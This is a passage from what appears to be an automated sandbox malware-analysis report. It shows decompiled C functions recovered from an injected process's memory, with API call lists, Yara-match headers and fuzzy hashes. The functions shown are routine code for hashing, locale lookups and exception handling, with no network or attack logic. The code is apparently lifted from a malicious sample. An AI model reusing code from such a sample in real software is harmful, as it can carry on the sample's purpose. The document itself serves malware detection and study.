                							if((_t256[2] & 0x00000002) != 0) {
                								 *_t265 =  *_t265 & 0xffffffef;
                							}
                							if((_t256[2] & 0x00000001) != 0) {
                								 *_t265 =  *_t265 & 0xffffffdf;
                							}
                							_t195 =  *_t256 & 0x00000003;
                							if(_t195 == 0) {
                								 *_t265 =  *_t265 & 0xfffff3ff;
                							} else {
                								_t206 = _t195 - 1;
                								if(_t206 == 0) {
                									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                									L55:
                									 *_t265 = _t209;
                									L58:
                									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                									if(_t199 == 0) {
                										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                										L64:
                										 *_t265 = _t202;
                										L65:
                										if(_a28 == 0) {
                											 *_t240 = _t256[0x14];
                										} else {
                											 *_t240 = _t256[0x14];
                										}
                										return _t202;
                									}
                									_t203 = _t199 - 1;
                									if(_t203 == 0) {
                										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                										goto L64;
                									}
                									_t202 = _t203 - 1;
                									if(_t202 == 0) {
                										 *_t265 =  *_t265 & 0xfffff3ff;
                									}
                									goto L65;
                								}
                								_t210 = _t206 - 1;
                								if(_t210 == 0) {
                									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                									goto L55;
                								}
                								if(_t210 == 1) {
                									 *_t265 =  *_t265 | 0x00000c00;
                								}
                							}
                							goto L58;
                						}
                						if(_t175 == 0x200) {
                							_t250 = _a4;
                							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                							goto L35;
                						}
                						if(_t175 == 0x300) {
                							 *_a4 =  *_a4 & 0xffffffe3;
                						}
                						goto L36;
                					}
                					if(_t172 == 0x800) {
                						_t257 = _a4;
                						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                						goto L26;
                					}
                					if(_t172 == 0xc00) {
                						 *_a4 =  *_a4 | 0x00000003;
                					}
                				}
                			}

                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00451BA6,?,?,00000008,?,?,00454ADE,00000000), ref: 00451DD8
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: eafd5dcc10c20ccae33b8622cd86151a9c5e622e5bdde7f1896852c197b6d485
                • Instruction ID: ce812bb0dd0712bfabea00db48cb60c78c84c80d6b37c0c35526caaf5cfcecc0
                • Opcode Fuzzy Hash: eafd5dcc10c20ccae33b8622cd86151a9c5e622e5bdde7f1896852c197b6d485
                • Instruction Fuzzy Hash: 45B15B315106089FD715CF28C486B657BE0FF45366F25865AEC9ACF2B2C339E98ACB44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00432251(void* __ecx, void* __edx) {
                				signed int _t202;
                				signed int _t203;
                				signed int _t204;
                				signed int _t205;
                				signed int _t209;
                				signed int _t210;
                				signed int _t211;
                				signed int _t213;
                				signed int _t214;
                				signed int _t215;
                				signed int _t218;
                				signed int _t219;
                				signed int _t220;
                				signed int _t222;
                				signed int _t223;
                				signed int _t224;
                				signed int _t227;
                				signed int _t228;
                				signed int _t229;
                				signed int _t231;
                				signed int _t232;
                				signed int _t233;
                				signed int _t236;
                				signed int _t237;
                				signed int _t238;
                				signed int _t240;
                				signed int _t241;
                				signed int _t242;
                				signed int _t245;
                				signed int _t246;
                				signed int _t247;
                				signed int _t250;
                				signed int _t251;
                				signed int _t252;
                				signed int _t256;
                				signed int _t257;
                				signed int _t258;
                				signed int _t261;
                				signed int _t262;
                				signed int _t263;
                				signed int _t267;
                				signed int _t268;
                				signed int _t269;
                				signed int _t272;
                				signed int _t273;
                				signed int _t274;
                				signed int _t278;
                				signed int _t279;
                				signed int _t280;
                				signed int _t283;
                				signed int _t284;
                				signed int _t285;
                				signed int _t290;
                				unsigned int _t294;
                				void* _t296;
                				signed int _t298;
                				void* _t395;
                				void* _t396;
                				void* _t397;
                				void* _t398;
                				void* _t399;
                				void* _t400;
                				void* _t401;
                				void* _t402;
                				void* _t403;
                				void* _t404;
                				void* _t406;
                				void* _t407;
                				void* _t408;
                				void* _t409;
                				void* _t410;
                				void* _t417;
                				void* _t418;
                				void* _t419;
                				void* _t420;
                				void* _t421;
                				void* _t428;
                				void* _t429;
                				void* _t430;
                				void* _t431;
                				void* _t432;
                				void* _t439;
                				void* _t440;
                				void* _t441;
                				void* _t442;
                				void* _t443;
                				signed int _t449;
                				void* _t450;
                				void* _t451;
                				void* _t452;
                				void* _t453;
                				void* _t454;
                				signed int _t460;
                				void* _t461;
                				void* _t462;
                				void* _t463;
                				void* _t464;
                				void* _t465;
                				signed int _t471;
                				void* _t472;
                				void* _t473;
                				void* _t474;
                				void* _t475;
                				void* _t476;
                				signed int _t482;
                				void* _t501;
                				void* _t508;
                				void* _t515;
                				void* _t522;
                				void* _t529;
                				void* _t536;
                				void* _t543;
                				void* _t550;
                				unsigned int _t553;
                				signed int _t558;
                				signed int _t563;
                				signed int _t568;
                				signed int _t573;
                				signed int _t578;
                				signed int _t583;
                				signed int _t588;
                				signed int _t593;
                				unsigned int* _t599;
                				signed int _t600;
                				void* _t601;
                				void* _t602;
                				void* _t603;
                
                				_t395 = __edx;
                				 *((intOrPtr*)(_t601 + 0x30)) = 0x30;
                				_t298 = 8;
                				 *((intOrPtr*)(_t601 + 0x14)) = __ecx;
                				memcpy(_t601 + 0x34, __ecx, _t298 << 2);
                				_t602 = _t601 + 0xc;
                				_push(0x10);
                				memcpy(_t602 + 0x54, _t395, 0 << 2);
                				_t603 = _t602 + 0xc;
                				_t599 = _t603 + 0x8c;
                				do {
                					_t553 =  *_t599;
                					_t294 =  *(_t599 - 0x34);
                					_t396 = 0x13;
                					_t202 = E00432187(_t553, _t396);
                					_t397 = 0x11;
                					_t203 = E00432187(_t553, _t397);
                					_t398 = 0x12;
                					_t204 = E00432187(_t294, _t398);
                					_t399 = 7;
                					_t205 = E00432187(_t294, _t399);
                					_t599 =  &(_t599[1]);
                					_t12 = _t603 + 0x30;
                					 *_t12 =  *(_t603 + 0x30) - 1;
                					_t599[1] = (_t202 ^ _t203 ^ _t553 >> 0x0000000a) + (_t204 ^ _t205 ^ _t294 >> 0x00000003) +  *((intOrPtr*)(_t599 - 0x3c)) +  *((intOrPtr*)(_t599 - 0x18));
                				} while ( *_t12 != 0);
                				 *(_t603 + 0x30) =  *(_t603 + 0x30) & 0x00000000;
                				_t558 =  *(_t603 + 0x50);
                				_t600 =  *(_t603 + 0x14);
                				 *(_t603 + 0x28) =  *(_t603 + 0x40);
                				 *(_t603 + 0x1c) =  *(_t603 + 0x4c);
                				 *(_t603 + 0x20) =  *(_t603 + 0x3c);
                				 *(_t603 + 0x1c) =  *(_t603 + 0x48);
                				_t208 =  *(_t603 + 0x48);
                				 *(_t603 + 0x28) =  *(_t603 + 0x38);
                				_t296 = 2;
                				 *(_t603 + 0x10) =  *(_t603 + 0x48);
                				 *(_t603 + 0x2c) =  *(_t603 + 0x38);
                				do {
                					_t400 = 0x19;
                					_t209 = E00432187(_t208, _t400);
                					_t401 = 0xb;
                					_t210 = E00432187( *(_t603 + 0x10), _t401);
                					_t402 = 6;
                					_t211 = E00432187( *(_t603 + 0x10), _t402);
                					_t212 =  *(_t603 + 0x30);
                					_t41 = _t212 + 0x46a370; // 0x428a2f98
                					_t501 = (_t209 ^ _t210 ^ _t211) + (( *(_t603 + 0x18) ^  *(_t603 + 0x1c)) &  *(_t603 + 0x10) ^  *(_t603 + 0x1c)) +  *_t41 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x58)) + _t558;
                					 *(_t603 + 0x2c) =  *(_t603 + 0x2c) + _t501;
                					_t403 = 0x16;
                					_t213 = E00432187( *(_t603 + 0x2c), _t403);
                					_t404 = 0xd;
                					_t214 = E00432187( *(_t603 + 0x2c), _t404);
                					_t215 = E00432187( *(_t603 + 0x2c), _t296);
                					_t563 =  *(_t603 + 0x28);
                					 *(_t603 + 0x14) = (( *(_t603 + 0x24) |  *(_t603 + 0x2c)) &  *(_t603 + 0x20) |  *(_t603 + 0x24) &  *(_t603 + 0x2c)) + (_t213 ^ _t214 ^ _t215) + _t501;
                					_t406 = 0x19;
                					_t218 = E00432187(_t563, _t406);
                					_t407 = 0xb;
                					_t219 = E00432187(_t563, _t407);
                					_t408 = 6;
                					_t220 = E00432187(_t563, _t408);
                					_t221 =  *(_t603 + 0x30);
                					_t59 = _t221 + 0x46a374; // 0x71374491
                					_t508 = (_t218 ^ _t219 ^ _t220) + (( *(_t603 + 0x18) ^  *(_t603 + 0x10)) & _t563 ^  *(_t603 + 0x18)) +  *_t59 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x5c)) +  *(_t603 + 0x20);
                					 *(_t603 + 0x24) =  *(_t603 + 0x24) + _t508;
                					_t409 = 0x16;
                					_t222 = E00432187( *(_t603 + 0x14), _t409);
                					_t410 = 0xd;
                					_t223 = E00432187( *(_t603 + 0x14), _t410);
                					_t224 = E00432187( *(_t603 + 0x14), _t296);
                					_t568 =  *(_t603 + 0x20);
                					 *(_t603 + 0x20) = (( *(_t603 + 0x2c) |  *(_t603 + 0x14)) &  *(_t603 + 0x24) |  *(_t603 + 0x2c) &  *(_t603 + 0x14)) + (_t222 ^ _t223 ^ _t224) + _t508;
                					_t417 = 0x19;
                					_t227 = E00432187(_t568, _t417);
                					_t418 = 0xb;
                					_t228 = E00432187(_t568, _t418);
                					_t419 = 6;
                					_t229 = E00432187(_t568, _t419);
                					_t230 =  *(_t603 + 0x30);
                					_t78 = _t230 + 0x46a378; // 0xb5c0fbcf
                					_t515 = (_t227 ^ _t228 ^ _t229) + (( *(_t603 + 0x28) ^  *(_t603 + 0x10)) & _t568 ^  *(_t603 + 0x10)) +  *_t78 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x60)) +  *(_t603 + 0x1c);
                					 *(_t603 + 0x28) =  *(_t603 + 0x28) + _t515;
                					_t420 = 0x16;
                					_t231 = E00432187( *(_t603 + 0x1c), _t420);
                					_t421 = 0xd;
                					_t232 = E00432187( *(_t603 + 0x1c), _t421);
                					_t233 = E00432187( *(_t603 + 0x1c), _t296);
                					_t573 =  *(_t603 + 0x24);
                					 *(_t603 + 0x1c) = (( *(_t603 + 0x14) |  *(_t603 + 0x1c)) &  *(_t603 + 0x2c) |  *(_t603 + 0x14) &  *(_t603 + 0x1c)) + (_t231 ^ _t232 ^ _t233) + _t515;
                					_t428 = 0x19;
                					_t236 = E00432187(_t573, _t428);
                					_t429 = 0xb;
                					_t237 = E00432187(_t573, _t429);
                					_t430 = 6;
                					_t238 = E00432187(_t573, _t430);
                					_t239 =  *(_t603 + 0x30);
                					_t97 = _t239 + 0x46a37c; // 0xe9b5dba5
                					_t522 = (_t236 ^ _t237 ^ _t238) + (( *(_t603 + 0x20) ^  *(_t603 + 0x28)) & _t573 ^  *(_t603 + 0x28)) +  *_t97 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x64)) +  *(_t603 + 0x14);
                					 *(_t603 + 0x30) =  *(_t603 + 0x30) + _t522;
                					_t431 = 0x16;
                					_t240 = E00432187( *(_t603 + 0x18), _t431);
                					_t432 = 0xd;
                					_t241 = E00432187( *(_t603 + 0x18), _t432);
                					_t242 = E00432187( *(_t603 + 0x18), _t296);
                					_t578 =  *(_t603 + 0x2c);
                					 *(_t603 + 0x14) = (( *(_t603 + 0x18) |  *(_t603 + 0x1c)) &  *(_t603 + 0x14) |  *(_t603 + 0x18) &  *(_t603 + 0x1c)) + (_t240 ^ _t241 ^ _t242) + _t522;
                					_t439 = 0x19;
                					_t245 = E00432187(_t578, _t439);
                					_t440 = 0xb;
                					_t246 = E00432187(_t578, _t440);
                					_t441 = 6;
                					_t247 = E00432187(_t578, _t441);
                					_t248 =  *(_t603 + 0x30);
                					_t116 = _t248 + 0x46a380; // 0x3956c25b
                					_t529 = (_t245 ^ _t246 ^ _t247) + (( *(_t603 + 0x20) ^  *(_t603 + 0x24)) & _t578 ^  *(_t603 + 0x20)) +  *_t116 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x68)) +  *(_t603 + 0x2c);
                					_t250 =  *(_t603 + 0x18) + _t529;
                					_t442 = 0x16;
                					 *(_t603 + 0x14) = _t250;
                					 *(_t603 + 0x50) = _t250;
                					_t251 = E00432187( *(_t603 + 0x10), _t442);
                					_t443 = 0xd;
                					_t252 = E00432187( *(_t603 + 0x10), _t443);
                					_t449 = (( *(_t603 + 0x18) |  *(_t603 + 0x10)) &  *(_t603 + 0x1c) |  *(_t603 + 0x18) &  *(_t603 + 0x10)) + (_t251 ^ _t252 ^ E00432187( *(_t603 + 0x10), _t296)) + _t529;
                					_t583 =  *(_t603 + 0x14);
                					 *(_t603 + 0x2c) = _t449;
                					 *(_t603 + 0x44) = _t449;
                					_t450 = 0x19;
                					_t256 = E00432187(_t583, _t450);
                					_t451 = 0xb;
                					_t257 = E00432187(_t583, _t451);
                					_t452 = 6;
                					_t258 = E00432187(_t583, _t452);
                					_t259 =  *(_t603 + 0x30);
                					_t137 = _t259 + 0x46a384; // 0x59f111f1
                					_t536 = (_t256 ^ _t257 ^ _t258) + (( *(_t603 + 0x24) ^  *(_t603 + 0x2c)) & _t583 ^  *(_t603 + 0x24)) +  *_t137 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x6c)) +  *(_t603 + 0x24);
                					_t261 =  *(_t603 + 0x20) + _t536;
                					_t453 = 0x16;
                					 *(_t603 + 0x1c) = _t261;
                					 *(_t603 + 0x4c) = _t261;
                					_t262 = E00432187( *(_t603 + 0x28), _t453);
                					_t454 = 0xd;
                					_t263 = E00432187( *(_t603 + 0x28), _t454);
                					_t460 = (( *(_t603 + 0x28) |  *(_t603 + 0x10)) &  *(_t603 + 0x18) |  *(_t603 + 0x28) &  *(_t603 + 0x10)) + (_t262 ^ _t263 ^ E00432187( *(_t603 + 0x28), _t296)) + _t536;
                					_t588 =  *(_t603 + 0x1c);
                					 *(_t603 + 0x24) = _t460;
                					 *(_t603 + 0x40) = _t460;
                					_t461 = 0x19;
                					_t267 = E00432187(_t588, _t461);
                					_t462 = 0xb;
                					_t268 = E00432187(_t588, _t462);
                					_t463 = 6;
                					_t269 = E00432187(_t588, _t463);
                					_t157 =  *(_t603 + 0x30) + 0x46a388; // 0x923f82a4
                					_t543 = (_t267 ^ _t268 ^ _t269) + (( *(_t603 + 0x2c) ^  *(_t603 + 0x14)) & _t588 ^  *(_t603 + 0x2c)) +  *_t157 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x6c)) +  *(_t603 + 0x24);
                					_t272 =  *(_t603 + 0x18) + _t543;
                					_t464 = 0x16;
                					 *(_t603 + 0x18) = _t272;
                					 *(_t603 + 0x48) = _t272;
                					_t273 = E00432187( *(_t603 + 0x20), _t464);
                					_t465 = 0xd;
                					_t274 = E00432187( *(_t603 + 0x20), _t465);
                					_t471 = (( *(_t603 + 0x20) |  *(_t603 + 0x28)) &  *(_t603 + 0x10) |  *(_t603 + 0x20) &  *(_t603 + 0x28)) + (_t273 ^ _t274 ^ E00432187( *(_t603 + 0x20), _t296)) + _t543;
                					_t593 =  *(_t603 + 0x18);
                					 *(_t603 + 0x28) = _t471;
                					 *(_t603 + 0x3c) = _t471;
                					_t472 = 0x19;
                					_t278 = E00432187(_t593, _t472);
                					_t473 = 0xb;
                					_t279 = E00432187(_t593, _t473);
                					_t474 = 6;
                					_t280 = E00432187(_t593, _t474);
                					_t281 =  *(_t603 + 0x30);
                					_t179 = _t281 + 0x46a38c; // 0xab1c5ed5
                					_t550 = (_t278 ^ _t279 ^ _t280) + (( *(_t603 + 0x14) ^  *(_t603 + 0x1c)) & _t593 ^  *(_t603 + 0x14)) +  *_t179 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x74)) +  *(_t603 + 0x30);
                					_t283 =  *(_t603 + 0x14) + _t550;
                					_t475 = 0x16;
                					 *(_t603 + 0x10) = _t283;
                					 *(_t603 + 0x44) = _t283;
                					_t284 = E00432187( *(_t603 + 0x24), _t475);
                					_t476 = 0xd;
                					_t285 = E00432187( *(_t603 + 0x24), _t476);
                					_t482 = (( *(_t603 + 0x20) |  *(_t603 + 0x24)) &  *(_t603 + 0x28) |  *(_t603 + 0x20) &  *(_t603 + 0x24)) + (_t284 ^ _t285 ^ E00432187( *(_t603 + 0x24), _t296)) + _t550;
                					_t558 =  *(_t603 + 0x14);
                					_t290 =  *(_t603 + 0x30) + 0x20;
                					 *(_t603 + 0x30) = _t290;
                					_t208 =  *(_t603 + 0x10);
                					 *(_t603 + 0x2c) = _t482;
                					 *(_t603 + 0x34) = _t482;
                				} while (_t290 < 0x100);
                				do {
                					asm("movups xmm0, [ebp]");
                					asm("movups xmm1, [eax+ebp]");
                					asm("paddd xmm1, xmm0");
                					asm("movups [ebp], xmm1");
                					_t600 = _t600 + 0x10;
                					_t296 = _t296 - 1;
                				} while (_t296 != 0);
                				return 0;
                 			}

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 0
                • API String ID: 0-4108050209
                • Opcode ID: 8b4612748608aeb2008bc8a0af576cbc32ea407e6710a776a8c7822d91d7aa14
                • Instruction ID: 59f9b37ce2e7c59d09aa74df1e0cfde51b0cda787351805797fb9724513e9a1f
                • Opcode Fuzzy Hash: 8b4612748608aeb2008bc8a0af576cbc32ea407e6710a776a8c7822d91d7aa14
                • Instruction Fuzzy Hash: EA127137B083519BD704DF65CA81A1EB3E2BFCC718F15492EF585A7381DA74E8068B86
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00450B93(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                				signed int _v8;
                				short _v248;
                				void* __ebp;
                				signed int _t16;
                				signed int _t22;
                				void* _t24;
                				void* _t31;
                				void* _t35;
                				signed int* _t50;
                				int _t53;
                				signed int _t54;
                
                				_t16 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t16 ^ _t54;
                				_t35 = E00446A95(__ebx, __ecx, __edx);
                				_t50 =  *(E00446A95(_t35, __ecx, __edx) + 0x34c);
                				_t53 = E00450C6B(_a4);
                				asm("sbb ecx, ecx");
                				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                				if(_t22 != 0) {
                					_t24 = E00452294(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                					if(_t24 != 0) {
                						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
                							_t31 = E00452294(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                							if(_t31 == 0) {
                								_push(_t50);
                								_push(_t31);
                								goto L9;
                							}
                						}
                					} else {
                						if( *(_t35 + 0x60) != _t24) {
                							L10:
                							 *_t50 =  *_t50 | 0x00000004;
                							_t50[1] = _t53;
                							_t50[2] = _t53;
                						} else {
                							_push(_t50);
                							_push(1);
                							L9:
                							_push(_t53);
                							if(E00450DC3(_t35) != 0) {
                								goto L10;
                							}
                						}
                					}
                				} else {
                					 *_t50 =  *_t50 & _t22;
                				}
                				return E004338BB(_v8 ^ _t54);
                 			}

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450BE7
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$_free$InfoLocale_abort
                • String ID:
                • API String ID: 1663032902-0
                • Opcode ID: 4597e0029ea091ecb2ebf5e98482b9f6fcb85861c7a3cfe2c1e922654fb1815e
                • Instruction ID: d6adf83c33703ae5228b67ec7a49f9fec95c79c937f4ddcaaa5f3f490f6395be
                • Opcode Fuzzy Hash: 4597e0029ea091ecb2ebf5e98482b9f6fcb85861c7a3cfe2c1e922654fb1815e
                • Instruction Fuzzy Hash: DB21D6365002069BDB2D9F25DC42A7773ACEB06316F1001BBFD05D6242EB78ED88CB59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E00450DC3(void* __ebx, signed int _a4, intOrPtr _a8) {
                				short _v8;
                				void* __ecx;
                				void* __ebp;
                				void* _t8;
                				void* _t12;
                				intOrPtr _t13;
                				void* _t16;
                				void* _t20;
                				void* _t22;
                				void* _t24;
                				signed int _t27;
                				intOrPtr* _t29;
                
                				_push(_t16);
                				_t8 = E00446A95(__ebx, _t16, _t22);
                				_t27 = _a4;
                				_t24 = _t8;
                				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
                					if(_t27 == _v8 || _a8 == 0) {
                						L7:
                						_t12 = 1;
                					} else {
                						_t29 =  *((intOrPtr*)(_t24 + 0x50));
                						_t20 = _t29 + 2;
                						do {
                							_t13 =  *_t29;
                							_t29 = _t29 + 2;
                						} while (_t13 != 0);
                						if(E00450917( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
                							goto L1;
                						} else {
                							goto L7;
                						}
                					}
                				} else {
                					L1:
                					_t12 = 0;
                				}
                				return _t12;
                 			}

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00450B61,00000000,00000000,?), ref: 00450DEF
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$InfoLocale_abort_free
                • String ID:
                • API String ID: 2692324296-0
                • Opcode ID: 10618e774f34a6619048d0637102a68081d551e0a0db41e4c1e10200fba24050
                • Instruction ID: 265ab6a49acb69b6371535c2f9c40041978aee9ae2e746c74d294b287eb083f8
                • Opcode Fuzzy Hash: 10618e774f34a6619048d0637102a68081d551e0a0db41e4c1e10200fba24050
                • Instruction Fuzzy Hash: 41F0493AA40117ABDB245A64C8077BB7B68EB00315F148C6AEC05A3241EA38FD0986D4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00446C84(void* __eflags) {
                				int _t15;
                				void* _t28;
                
                				E00433700(0x46ca10, 0xc);
                				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
                				E00444189( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
                				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                				 *0x470738 = E004425DA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
                				_t15 = EnumSystemLocalesW(E00446C3E, 1);
                				_push(0x20);
                				asm("ror eax, cl");
                				 *0x470738 = 0 ^  *0x46f00c;
                				 *(_t28 - 0x1c) = _t15;
                				 *(_t28 - 4) = 0xfffffffe;
                				E00446CFC();
                				return E00433746();
                 			}

                APIs
                  • Part of subcall function 00444189: EnterCriticalSection.KERNEL32(-0006B43D,?,004418AB,00000000,0046C868,0000000C,00441866,?,?,?,00444427,?,?,00446B4A,00000001,00000364), ref: 00444198
                • EnumSystemLocalesW.KERNEL32(00446C3E,00000001,0046CA10,0000000C), ref: 00446CBC
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CriticalEnterEnumLocalesSectionSystem
                • String ID:
                • API String ID: 1272433827-0
                • Opcode ID: aa06587be2c9cb8b071f33295b8cbec66515d87765e7fc573258893074f482cb
                • Instruction ID: 8a714871f2e0af15b08c3d487532fbc1d9fceb156b6070508e72b175ec7fb5e6
                • Opcode Fuzzy Hash: aa06587be2c9cb8b071f33295b8cbec66515d87765e7fc573258893074f482cb
                • Instruction Fuzzy Hash: F4F04F72610204EFE714EF68E886B5D77E0EB05725F10813BF844DB2E2DB799A808F59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004507D0(void* __ecx, void* __edx, signed char* _a4) {
                				void* __ebp;
                				intOrPtr _t9;
                				signed char* _t13;
                				void* _t14;
                				intOrPtr* _t16;
                				void* _t20;
                				void* _t22;
                
                				_t20 = E00446A95(_t14, __ecx, __edx);
                				_t16 =  *((intOrPtr*)(_t20 + 0x54));
                				_t22 = _t16 + 2;
                				do {
                					_t9 =  *_t16;
                					_t16 = _t16 + 2;
                				} while (_t9 != 0);
                				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
                				EnumSystemLocalesW(0x450727, 1);
                				_t13 = _a4;
                				if(( *_t13 & 0x00000004) == 0) {
                					 *_t13 = 0;
                					return _t13;
                				}
                				return _t13;
                 			}

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • EnumSystemLocalesW.KERNEL32(00450727,00000001,?,?,?,00450F92,m3D,?,?,?,?,?,0044336D,?,?,?), ref: 00450807
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                • String ID:
                • API String ID: 1084509184-0
                • Opcode ID: 9174a0c065a7b49ba50cb90ab7ddfc1d90f3254fc2b27fe64f266881c7e4a03e
                • Instruction ID: 6cc6cd71b12713b10ec057b6d25e2a24f4d08592f735aee3b5647b3ea735c769
                • Opcode Fuzzy Hash: 9174a0c065a7b49ba50cb90ab7ddfc1d90f3254fc2b27fe64f266881c7e4a03e
                • Instruction Fuzzy Hash: 6DF05C3930024597CB049F35DC05A6BBF50EFC2755B06805EEE058B641C635AC46CB54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E0040EE14(void* __ecx) {
                				char _v8;
                				void* __ebp;
                				void* _t8;
                				void* _t11;
                				void* _t13;
                				void* _t15;
                
                				_push(__ecx);
                				_t13 = __ecx;
                				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
                				E00402073(_t8, _t13, _t11, _t15,  &_v8);
                				return _t13;
                			}










                APIs
                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00414839,00472EC8,00473950,00472EC8,00000000,00472EC8,00000000,00472EC8,4.6.0 Pro), ref: 0040EE28
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: 89d85122d4b319954b498ca729ef7b6588c5c2e3b4f1b669d3eb966a2cd12403
                • Instruction ID: f278ed4507f78d565aa92993a3921e54a570b3fb05803534b7f05061c5bfe0db
                • Opcode Fuzzy Hash: 89d85122d4b319954b498ca729ef7b6588c5c2e3b4f1b669d3eb966a2cd12403
